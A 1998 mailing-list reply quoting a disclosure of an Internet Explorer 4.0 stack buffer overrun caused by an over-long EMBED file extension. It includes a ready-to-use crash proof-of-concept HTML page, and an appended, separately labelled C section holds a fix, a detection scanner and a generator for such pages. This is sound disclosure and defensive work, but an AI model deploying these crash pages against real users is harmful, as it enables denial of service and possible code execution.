Re: MSIE buffer overrun

Christian Holmqvist (pt95cho@STUDENT.HK-R.SE)
Fri, 20 Mar 1998 17:13:10 +0100

On Fri, 20 Mar 1998, Georgi Guninski wrote:
Hi!

This not only crashes MSIE4 but also Eudora4.0 (yes the mail reader...)
I can't read this mail without a crash. I had to read it in pine on a
unix system.

Cheers Christian

> Microsoft Internet Explorer 4.0 (don't know for other versions)
> can be crashed and eventually made to execute arbitrary code
> with a little help from the <EMBED> tag.
>
> The following:
> <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
> opens a dialog box and closes IE 4.0.
> It seems that the long file extension causes stack overrun.
>
> The stack is smashed - full with our values, EIP is also ours and CS=SS.
> So probably a string could be constructed, executing code at the
> client's machine.
>
> Solution: Do not browse hostile pages.
> To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html
>
>
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711
>
> -----------------------cut here and save as
> crashmsie.html---------------------
> <HTML>
> Trying to crash IE 4.0
> <EMBED
> SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
> 40
> 80 160 170 180 190 200
> </HTML>
>

Mvh Christian

/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\
| Christian Holmqvist |
| Email: pt95cho@student.hk-r.se |
| Tele: 0457-17754 |
\________________________________/
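Added example, not code from either poster: a C sketch of the bug class the quoted report describes (a fixed-size stack buffer for the file extension of an EMBED SRC value) with a bounded copy that rejects over-long input instead of overrunning, plus a defender-side scan that flags EMBED tags carrying an oversized extension. EXT_MAX, the function names and the constructed sample page are assumptions; the real MSIE buffer size is not on the page.

```c
#include <stdbool.h>
#include <string.h>

/* Hypothetical fixed stack-buffer size for an extension; not the real MSIE value. */
#define EXT_MAX 32

/* Length of the extension (text after the last '.') of an attribute value,
 * which ends at whitespace, '>', a quote or NUL.  0 when there is none. */
size_t extension_length(const char *value) {
    size_t end = strcspn(value, " \t\r\n>\"'"), last_dot = end;
    for (size_t i = 0; i < end; i++)
        if (value[i] == '.') last_dot = i;
    return last_dot == end ? 0 : end - last_dot - 1;
}

/* Hardened form of the pattern the report implies (strcpy of the extension
 * into a char[EXT_MAX] on the stack): measure first and refuse an extension
 * that would not fit with its NUL, instead of writing past the buffer. */
bool copy_extension_bounded(const char *value, char *out, size_t out_size) {
    size_t end = strcspn(value, " \t\r\n>\"'"), n = extension_length(value);
    if (n == 0 || n >= out_size) return false;
    memcpy(out, value + end - n, n);
    out[n] = '\0';
    return true;
}

/* Defender-side check: count <EMBED SRC=...> attributes in an HTML buffer
 * whose extension is longer than `threshold` characters. */
size_t count_long_embed_src(const char *html, size_t threshold) {
    size_t hits = 0;
    for (const char *p = strstr(html, "<EMBED"); p; p = strstr(p + 1, "<EMBED")) {
        const char *src = strstr(p, "SRC="), *gt = strchr(p, '>');
        if (src && (!gt || src < gt) && extension_length(src + 4) > threshold)
            hits++;
    }
    return hits;
}

/* Constructed sample page shaped like the report's crashmsie.html, with an
 * extension of `ext_len` digits.  Returns false if it does not fit in buf. */
bool build_embed_page(char *buf, size_t size, size_t ext_len) {
    const char *head = "<HTML>\n<EMBED SRC=file://C|/A.", *tail = ">\n</HTML>\n";
    size_t pos = strlen(head);
    if (pos + ext_len + strlen(tail) + 1 > size) return false;
    memcpy(buf, head, pos);
    for (size_t i = 0; i < ext_len; i++) buf[pos++] = (char)('0' + i % 10);
    memcpy(buf + pos, tail, strlen(tail) + 1);
    return true;
}
```

Run against a page built with a 200-character extension, the scan reports one hit and the bounded copy refuses the value; a plain `A.html` passes both.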